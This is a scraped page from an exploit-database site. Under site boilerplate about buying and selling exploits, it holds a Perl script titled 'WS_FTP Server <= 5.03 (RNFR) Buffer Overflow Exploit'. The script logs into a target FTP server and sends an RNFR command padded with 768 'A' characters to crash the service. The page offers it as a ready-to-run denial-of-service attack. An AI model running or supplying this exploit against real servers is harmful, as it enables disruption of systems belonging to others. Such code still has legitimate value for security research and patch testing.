0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit
==================================================== WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit ==================================================== #===== Start WS_FTP_Overflow.pl ===== # # Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass> # WS_FTP_Overflow.pl 127.0.0.1 hello moto # # WS_FTP Server Version 5.03, 2004.10.14 # # Download: # http://www.ipswitch.com/ # ###################################################### use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "21", Proto => "TCP")) { print "Attempting to kill WS_FTP Server service at $ARGV[0]:21..."; sleep(1); print $socket "USER $ARGV[1]\r\n"; sleep(1); print $socket "PASS $ARGV[2]\r\n"; sleep(1); print $socket "PORT 127,0,0,1,18,12\r\n"; sleep(1); print $socket "RNFR " . "A" x 768 . "\r\n"; close($socket); } else { print "Cannot connect to $ARGV[0]:21\n"; } #===== End WS_FTP_Overflow.pl ===== # 0day.today [2024-11-16] #